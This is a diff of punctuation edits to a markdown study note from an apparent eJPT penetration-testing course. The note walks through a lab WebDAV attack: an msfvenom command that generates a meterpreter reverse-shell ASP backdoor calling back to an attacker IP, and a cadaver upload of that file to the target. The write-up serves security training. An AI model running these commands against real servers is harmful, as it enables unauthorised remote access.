yazarbrahim/eJPT---Assessment-Methodologies-/Host & Network Penetration Testing_ System-Host Base Attack.md

 ![c194c2402d740348fa938bf3e374dd7a.png](resources/c194c2402d740348fa938bf3e374dd7a.png)

-As per the results given in davtest, for this purpose let’s use the “.asp” extension.
+As per the results given in davtest, for this purpose, let’s use the “.asp” extension.
 Now, we need to create a malicious file that allows us to obtain a reverse shell since we can access the “WebDav” directory.
 Use the following command to create a malicious file using **msfvenom**.

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.40.3 LPORT=4444 -f asp > backdoor.asp

-- \-p : `payload`
+- \-p: `payload`
-- LHOST : `localhost (ip address of the attack machine)`
+- LHOST: `localhost (ip address of the attack machine)`
-- LPORT : `localport (a port on the attack machine)`
+- LPORT: `localport (a port on the attack machine)`
-- \-f : `file type`
+- \-f: `file type`

 When you run the above command, a file called “backdoor.asp” will be generated with the given parameters.
 You can check the file by listing the contents of the current directory, whether it is created or not.

 ![0f2ef8b124e2426877bb5f076dc7db60.png](resources/0f2ef8b124e2426877bb5f076dc7db60.png)

-After that we can upload the generated file using **Cadaver** to the “WebDAV” directory.
+After that, we can upload the generated file using **Cadaver** to the “WebDAV” directory.

 cadaver http://target1.ine.local/webdav/

-After that you have to provide the username and the password to access.
+After that, you have to provide the username and the password to access.

 put backdoor.asp